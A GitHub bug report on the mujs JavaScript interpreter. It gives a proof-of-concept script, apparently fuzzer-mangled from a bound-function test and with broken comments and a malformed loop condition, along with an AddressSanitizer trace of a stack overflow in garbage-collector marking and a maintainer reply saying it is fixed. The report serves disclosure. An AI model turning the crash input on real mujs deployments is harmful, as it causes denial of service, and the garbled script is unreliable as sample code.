Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

stack overflow #134

Closed
rain6851 opened this issue Apr 17, 2020 · 3 comments
Closed

stack overflow #134

rain6851 opened this issue Apr 17, 2020 · 3 comments

Comments

@rain6851
Copy link

Enviroment

operating system: ubuntu18.04
compile command:  make build=sanitize

test command: ./mujs  poc 

poc

/*
 est bound function chainnal implementation
 *  to "collapse" bound funct
/*===
F() bound foo
object this-F
string foo
undefined undefined
undefined undefined
undefined undefined
G() bound bound foo
object this-F
string foo
string bar
string quux
unarg-52
53 string arg-53
54 string arg-54
55 string arg-55
56 string arg-56
57 string arg-57
58 string arg-58
59 string arg-59
60 string arg-60
61 string arg-61
62 string arg-62
63 string arg-63
64 string arg-64
65 string arg-65
66 string arg-66
67 string arg-67
68 string arg-68
69 string arg-69
70 string arg-70
71 string arg-71
72 string arg-72
73 string arg-73
74 string arg-74
75 string arg-75
76 string arg-76
77 string arg-77
78 string arg-78
79 string arg-79
80 string arg-80
81 string arg-81
82 string arg-82
83 string arg-83
84 string arg-84
85 string arg-85
86 string arg-86
87 string arg-87
88 string arg-88
89 string arg-89
90 string arg-90
91 string arg-91
92 string arg-92
93 string arg-93
94 string arg-94
95 string arg-95
96 string arg-96
97 string arg-97
98 string arg-98
99 string arg-99
===*/

function test() {
    var func;
    var F, G, H, I;

    // Final function is an ECMAScript function.

    func = function foo(a, b, c, d) {
        print(typeof this, this);
        print(typeof a, a);
        print(typeof b, b);
        print(typeof c, c);
        print(typeof d, d);
    };
    F = func.bind('this-F', 'foo');
    G = F.bind('this-G', 'bar', 'quux');
    H = G.bind('this-H', 'baz', 'quuux');
    I = G.bind('this-I', 123, 234);  // both H and I bind via G

    print('F()', F.name);
    F();
    print('G()', G.name);
    G();
    print('H()', H.name);
    H();
    print('I()', I.name);
    I();

    // Final function is a native function.

    func = Math.max;
    F = func.bind(null);
    G = F.bind(null, 3);
    H = G.bind(null, 4);
    I = H.bind(null, 5);

    print('F()', F.name);
    print(F());
    print('G()', G.name);
    print(G());
    print('H()', H.name);
    print(H());
    print('I()', I.name);
    print(I());

    // Lightfunc final target needs testing too; it is covered by Math.max()
    // if DUK_USE_LIGHTFUNC_BUILTINS is enabled.

    // Long chain.

    func = function foo() {
        print(typeof this, this);
        print(arguments.length);
        for (var i = 0; i < arguments.length; i++) {
            print(i, typeof arguments[i], arguments[i]);
        }
    };

    for (var i = 0;!i < 100; i++) {
        func = func.bind('this-' + i, 'arg-' + i);
    }
    print(func.name);
    func();
}

try {
    test();
} catch (e) {
}

vulnerability description:

Poc will cause stack overflow. As shown below:

ASAN:SIGSEGV
=================================================================
==19628==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd0fa89ff8 (pc 0x00000041ecf2 bp 0x7ffd0fa8a010 sp 0x7ffd0fa89ff0 T0)
    #0 0x41ecf1 in jsG_markproperty /home/node/xmujs/jsgc.c:76
    #1 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #2 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #3 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #4 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #5 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #6 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #7 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #8 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #9 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #10 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #11 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #12 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #13 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #14 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #15 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #16 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #17 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #18 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #19 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #20 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #21 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #22 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #23 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #24 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #25 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #26 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #27 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #28 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #29 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #30 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #31 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #32 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #33 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #34 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #35 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #36 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #37 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #38 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #39 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #40 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #41 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #42 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #43 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #44 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #45 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #46 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #47 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #48 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #49 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #50 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #51 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #52 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #53 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #54 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #55 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #56 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #57 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #58 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #59 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #60 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #61 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #62 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #63 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #64 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #65 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #66 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #67 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #68 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #69 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #70 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #71 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #72 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #73 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #74 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #75 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #76 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #77 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #78 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #79 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #80 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #81 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #82 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #83 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #84 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #85 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #86 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #87 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #88 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #89 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #90 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #91 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #92 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #93 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #94 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #95 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #96 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #97 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #98 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #99 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #100 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #101 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #102 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #103 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #104 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #105 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #106 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #107 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #108 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #109 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #110 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #111 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #112 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #113 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #114 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #115 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #116 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #117 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #118 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #119 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #120 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #121 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #122 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #123 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #124 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #125 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #126 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #127 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #128 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #129 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #130 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #131 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #132 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #133 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #134 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #135 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #136 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #137 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #138 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #139 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #140 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #141 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #142 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #143 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #144 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #145 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #146 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #147 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #148 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #149 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #150 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #151 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #152 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #153 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #154 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #155 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #156 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #157 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #158 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #159 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #160 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #161 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #162 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #163 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #164 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #165 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #166 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #167 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #168 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #169 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #170 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #171 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #172 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #173 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #174 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #175 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #176 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #177 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #178 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #179 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #180 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #181 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #182 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #183 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #184 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #185 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #186 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #187 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #188 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #189 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #190 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #191 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #192 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #193 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #194 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #195 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #196 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #197 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #198 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #199 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #200 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #201 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #202 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #203 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #204 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #205 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #206 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #207 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #208 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #209 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #210 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #211 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #212 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #213 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #214 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #215 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #216 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #217 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #218 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #219 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #220 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #221 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #222 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #223 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #224 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #225 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #226 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #227 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #228 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #229 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #230 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #231 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #232 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #233 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #234 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #235 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #236 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #237 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #238 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #239 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #240 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #241 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #242 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #243 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #244 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #245 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #246 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #247 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78
    #248 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94
    #249 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83
    #250 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77
    #251 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78

SUMMARY: AddressSanitizer: stack-overflow /home/node/xmujs/jsgc.c:76 jsG_markproperty
==19628==ABORTING
@rain6851
Copy link
Author

rain6851 commented May 7, 2020

@ccxvii @sebras please check the issues.

@yurivict
Copy link

Reproducible on FreeBSD:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==18375==ERROR: AddressSanitizer: stack-overflow on address 0x7fffdfffffe8 (pc 0x0000002f218a bp 0x7fffe0000150 sp 0x7fffdffffff0 T0)
    #0 0x2f2189 in jsG_markobject /usr/ports/lang/mujs/work/mujs-1.0.7/./jsgc.c:94:34

SUMMARY: AddressSanitizer: stack-overflow /usr/ports/lang/mujs/work/mujs-1.0.7/./jsgc.c:94:34 in jsG_markobject
==18375==ABORTING

@ccxvii
Copy link
Owner

ccxvii commented May 27, 2020

Should be fixed with the same commit that fixed issue 133. Thanks for the report!

@ccxvii ccxvii closed this as completed May 27, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants